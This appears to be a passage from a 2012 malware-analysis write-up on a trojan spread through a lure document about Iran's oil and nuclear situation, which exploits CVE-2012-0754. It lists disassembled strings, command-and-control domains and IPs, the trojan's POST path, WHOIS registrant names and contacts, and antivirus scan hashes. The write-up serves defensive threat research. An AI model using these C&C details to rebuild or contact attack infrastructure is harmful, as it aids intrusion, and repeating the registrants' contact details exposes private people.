SSZ004052DC_0_fIz9Dq2c7I 004052EC: SSZ004052EC_0_fIz8fv2OXT58fR7A__ 00405304: SSZ00405304_0_fIz9Pn2dvm2dDU68g_ 0040531C: SSZ0040531C_zvTH2c7b2MjH_v3Z2N3d1OvP 00405338: SSZ00405338_zvTH2c7b2MjQ6tnO9MjOzNDJyA__ 00405358: SSZ00405358_zvTH2c7b2Mja9tjU5sjQ1Mg_ 00405374: SSZ00405374_zvTH2c7b2MjH_8jM0_fH0Q__ 00405390: SSZ00405390_2PXc2cf6yM_H_9fc2cjn2evl 004053AC: SSZ004053AC_2PXc2cf6yM_H_9fc2cjr2Q__ 004053C8: SSZ004053C8_2PXc2dzuzsjH_9fc2cjr2Q__ 004053E4: SSZ004053E4_zvTH2c7b2Mjd6s7Pycjr2Q__ 00405400: SSZ00405400_zvTH2c7b2Mjc7s7I7A__ 00405418: SSZ00405418_x_voxtDI2Mj2yNDMx9js 00405430: SSZ00405430_0PrHyN0_ 0040543C: SSZ0040543C_x_vpxt3Rx9rH8uQ_ 00405450: SSZ00405450_x_v5xtjIy_fX0efI6_U_ 00405468: SSZ00405468_x_vpxsfb2MzxyOPI5Ojs 00405480: SSZ00405480_common 00405488: SSZ00405488_eabvjp33e_ml 00405498: SSZ00405498_pSufbwfrN_diprpsufX_oipdtwD_sufr 004054C8: SSZ004054C8_aspe 004054D0: SSZ004054D0_fkorme33e_ml 004054E0: SSZ004054E0_gram_Files__ 004054F0: SSZ004054F0_c__Pro 004054F8: SSZ004054F8__cmd_exe 00405504: SSZ00405504_exit__ 0040550C: SSZ0040550C_exit_ 00405514: SSZ00405514_POST 0040551C: SSZ0040551C__bbs_info_asp 0040552C: SSZ0040552C_HTTP_1_1 00405538: SSZ00405538__aumLib_ini 00405544: L00405544 00405548: SSZ00405548_Appmt_exe 00405554: SSZ00405554_0_0_0_0 0040555C: SSZ0040555C_jwjnfn_tmdl 00405568: L00405568 0040556C: SSZ0040556C_Identifier 00405578: SSZ00405578_C__Program_Files_Common_Files_co 004055A4: SSZ004055A4_CommonProgramFiles 004055B8: SSZ004055B8_abcdef 004055C0: SSZ004055C0__Zone_ 004055C8: L004055C8 004055CC: SSZ004055CC__s_v_d__d_build__d 004055E0: SSZ004055E0_Win3_1 004055E8: SSZ004055E8_Win95 004055F0: SSZ004055F0_WinNT 004055F8: SSZ004055F8_Win_ 00405600: L00405600 00405604: L00405604 00405608: L00405608 0040560C: SSZ0040560C__08x 00405614: L00405614 00405618: SSZ00405618_Open 00405620: SSZ00405620____nul 00405628: SSZ00405628__c_del_ 00405630: SSZ00405630_COMSPEC 00405640: L00405640 00405650: L00405650 00405654: L00405654 00405658: L00405658 0040565C: L0040565C 00405660: L00405660 00405664: L00405664 00405668: L00405668 0040566C: L0040566C 00405670: L00405670 00405674: L00405674 00405678: L00405678 0040567C: L0040567C 00405680: L00405680 00405684: L00405684 00405688: L00405688 0040568C: L0040568C 00405694: L00405694 00405698: L00405698 0040569C: L0040569C 004056A0: L004056A0 004056A4: L004056A4 004056A8: L004056A8 004056AC: L004056AC 004056B0: L004056B0 004056B4: L004056B4 004056B8: L004056B8 004056C8: L004056C8 004056CC: L004056CC 004056D0: L004056D0 004056D4: L004056D4 004056D8: L004056D8 004056EC: L004056EC 004056F0: L004056F0 004056F4: L004056F4 004056F8: L004056F8 004056FC: L004056FC 00405700: L00405700 00405704: L00405704 00405708: L00405708

Traffic and C&C 

C&Cs and the post request this this type of trojan makes are encoded in the binary.  I didn't capture a good pcap for the binary but you can see the netflow on the process monitor output posted below. The download package includes the PML log.

www.documents.myPicture.info
199.192.156.134
documents.myPicture.info
199.192.156.134
ftp.documents.myPicture.info
68.85.151.214

POST /bbs/info.asp

Process monitor network log

mypicture.info
204.16.173.30
vanity.changeip.com
ChangeIP.com
ChangeIP.com
c/o Dynamic DNS Provider

199.192.156.134
Host reachable, 89 ms. average
199.192.152.0 - 199.192.159.255
VPS21 LTD
38958 S FREMONT BLVD
FREMONT
CA
94536
United States
zou, jinhe
+1-408-205-7550
zoujinhe@ehostingusa.com  -- a lot of Chinese language sites on that VPS

68.85.151.214
te-3-0-0-ten07.eugene.or.bverton.comcast.net
Host reachable, 100 ms. average
68.80.0.0 - 68.87.255.255
Comcast Cable Communications, Inc.
1800 Bishops Gate Blvd
Mt Laurel
NJ
08054
United States  -  Comcast cable modem in Beaverton, OR  in an area of restaurants and businesses in the western urban area of Beaverton  ,  thanks to the anonymous for the tips


Update: March 9, 2012

kiki.edns.biz - subdomain is currently down

edns.biz
vanity.changeip.com
Sam Norris
ChangeIP.com
P.O. Box 2333
San Marcos
California

it was 12.4.228.10

12.4.228.10Host reachable, 33 ms. average
12.4.228.0 - 12.4.228.127
STAR TECH INC
1490 N HERMITAGE RD
HERMITAGE
PA
16148
United States

Automatic scans

Vicheck scan


Virustotal
SHA256:     2dd92dcfe5a46143b9a879122432e48ef0b9016736b66cd322f5c9fb5d3441dd
SHA1:     988541c505fef37a48eca2cad926ec378a09a526
MD5:     e92a4fc283eb2802ad6d0e24c7fcc857
File size:     104.1 KB ( 106604 bytes )
File name:     Iran's Oil and Nuclear Situation.doc
File type:     MS Word Document
Detection ratio:     7 / 43
Analysis date:     2012-03-05 13:16:51 UTC ( 0 minutes ago )
Avast     SWF:Dropper [Heur]     20120305
Emsisoft     Exploit.D-Encrypted!IK     20120305
nProtect     Exploit.D-Encrypted.Gen     20120305


Virustotal
HA256:     68360603794c0f6d1aff9f6853dbdbb1860a89269d3147dab768034d4195ca62
SHA1:     8b79abcb79a8ab962d386dfc3e51ac5de9428d4f
MD5:     fd1be09e499e8e380424b3835fc973a8
File size:     4.6 MB ( 4861440 bytes )
File name:     us.exe
File type:     Win32 EXE
Detection ratio:     7 / 42
Analysis date:     2012-03-03 18:42:59 UTC ( 1 day, 18 hours ago )
BitDefender     Gen:Variant.Graftor.15447     20120303
F-Secure     Gen:Variant.Graftor.15447     20120303
GData     Gen:Variant.Graftor.15447     20120303
Kaspersky     Trojan.Win32.AntiAV.ptv     20120303
Microsoft     Trojan:Win32/Yayih.A     20120303
NOD32     a variant of Win32/Agent.OJL     20120303


Virustotal
SHA256:     e7ed13395dc2cc89cd7814c84c14b175c57c8fc0e6864ec304901af054b5199c
SHA1:     cd3ce4c08704ba447b39fc562215f41c007187f5
MD5:     cb3dcde34fd9ff0e19381d99b02f9692
File size:     22.5 KB ( 23040 bytes )
File name:     us-embedded.exe
File type:     Win32 EXE
Detection ratio:     9 / 43
Analysis date:     2012-03-05 13:18:10 UTC ( 0 minutes ago )
Avast     Win32:Malware-gen     20120305
AVG     Generic27.AFPX     20120305
DrWeb     Trojan.MulDrop3.38640     20120305
F-Secure     Gen:Variant.Graftor.15447     20120305
GData     Gen:Variant.Graftor.15447     20120305
Kaspersky     Trojan.Win32.AntiAV.ptv     20120305
Microsoft     Trojan:Win32/Yayih.A     20120305
NOD32     a variant of Win32/Agent.OJL     20120305

Virustotal
SHA256:     ab8bc59730a9c709214fb1a14c88dc64c979480d0fa34e19e99be644e4e9ee40
SHA1:     74c1e426a7ab9cf77a57b919a0c0fc563c15b441
MD5:     128a66cc3efe6f424c3fedcc4b6235ac
File size:     2.4 KB ( 2431 bytes )
File name:     File3~.swf
File type:     Flash
Detection ratio:     2 / 43
Analysis date:     2012-03-03 19:26:57 UTC ( 1 day, 17 hours ago )
Avast     SWF:Dropper [Heur]     20120303
GData     SWF:Dropper     20120303

VIrustotal
SHA256:     bb6d781d1bd4da0914670a83b419b605661bbfac86bf9ae153f81fe94bbb6425
SHA1:     8db153c242ea8b4ce8b12a80f875f50ec92ecf97
MD5:     8933598c8b1fa5e493497b11c48da4f2
File size:     21.9 KB ( 22384 bytes )
File name:     test.mp4
File type:     MP4
Detection ratio:     6 / 43
Analysis date:     2012-03-03 16:29:25 UTC ( 1 day, 20 hours ago )
BitDefender     Exploit.CVE-2012-0754.Gen     20120303
Emsisoft     Exploit.MS04.CVE-2004-0210-2012-0754!IK     20120303
F-Secure     Exploit.CVE-2012-0754.Gen     20120303
GData     Exploit.CVE-2012-0754.Gen     20120303
Ikarus     Exploit.MS04.CVE-2004-0210-2012-0754     20120303
nProtect     Exploit.CVE-2012-0754.Gen     20120303

Excel file and payload scans

Virustotal

SHA256:     c34ad3cac4d3b8420fa8dbe1bb0760623ecfa27a6ab7790c231e9e3a92b9039c
SHA1:     4e03e469d9040307bcdd1461f4f242d73ff40d4c
MD5:     198de4a1ebf05f7f44faf76f167b0233
File size:     235.6 KB ( 241236 bytes )
File name:     CVE-2012-0744-xls.xls
File type:     MS Excel Spreadsheet
Detection ratio:     16 / 43
Analysis date:     2012-03-09 17:13:48 UTC ( 0 minutes ago )
AhnLab-V3     Dropper/Cve-2012-0754     20120308
Avast     SWF:Dropper [Heur]     20120309
BitDefender     Script.SWF.Cxx     20120309
ClamAV     Exploit.xls-1     20120309
Comodo     UnclassifiedMalware     20120309
Emsisoft     Exploit.D-Encrypted!IK     20120309
F-Secure     Script.SWF.Cxx     20120309
GData     Script.SWF.Cxx     20120309
Ikarus     Exploit.D-Encrypted     20120309
Microsoft     Exploit:SWF/CVE-2012-0754.A     20120309
NOD32     SWF/Exploit.CVE-2012-0754.B     20120309
nProtect     Exploit/W32.CVE-2012-0754.241236     20120309
Symantec     Trojan.Mdropper     20120309
TrendMicro     TROJ_MDROP.AW     20120309
TrendMicro-HouseCall     TROJ_MDROP.AW     20120309
ViRobot     Exploit.S.CVE-2012-0754.241236     20120309

Virustotal

SHA256:     b3a97be4160fb261e138888df276f9076ed76fe2efca3c71b3ebf7aa8713f4a4
SHA1:     12e36f86ce54576cc38b2edfd13e3a5aa6c8d51c
MD5:     ad7f04e73e19debf7c38034e3daaf535
File size:     60.0 KB ( 61440 bytes )
File name:     ad7f04e73e19debf7c38034e3daaf535
File type:     Win32 EXE
Detection ratio:     12 / 43
Analysis date:     2012-03-07 15:23:09 UTC ( 2 days, 1 hour ago )
AhnLab-V3     Win-Trojan/Renos.61440.E     20120307
AntiVir     TR/Renos.AX     20120307
Avast     Win32:Malware-gen     20120307
BitDefender     Trojan.Generic.KDV.554937     20120307
Commtouch     -     20120307
Emsisoft     Trojan.Renos!IK     20120307
F-Secure     Trojan.Generic.KDV.554937     20120307
GData     Trojan.Generic.KDV.554937     20120307
Ikarus     Trojan.Renos     20120307
McAfee     Generic.grp!gz     20120307
McAfee-GW-Edition     Artemis!AD7F04E73E19     20120307
NOD32     a variant of Win32/Demtranc.AA     20120307
VIPRE     Trojan.Win32.Generic.pak!cobra     20120307

Virustotal

SHA256:     d018ea9fea664b9608474e1271aaf23fe5d3b6161a2db486592e763475e377bd
SHA1:     a2eb4ee6e2d4f2e51dca1d238e017d6420156bfe
MD5:     143e2fd4d39199abf7b871a2bb96ff1f
File size:     2.4 KB ( 2436 bytes )
File name:     CVE-2012-0744-xls.swf
File type:     Flash
Detection ratio:     8 / 43
Analysis date:     2012-03-09 17:14:45 UTC ( 0 minutes ago )
Avast     SWF:Dropper [Heur]     20120309
BitDefender     Script.SWF.Cxx     20120309
F-Secure     Script.SWF.Cxx     20120309
GData     Script.SWF.Cxx     20120309
Microsoft     Exploit:SWF/CVE-2012-0754.A     20120309
NOD32     SWF/Exploit.CVE-2012-0754.B     20120309
nProtect     Script.SWF.Cxx     20120309
Symantec     Trojan.Mdropper     20120309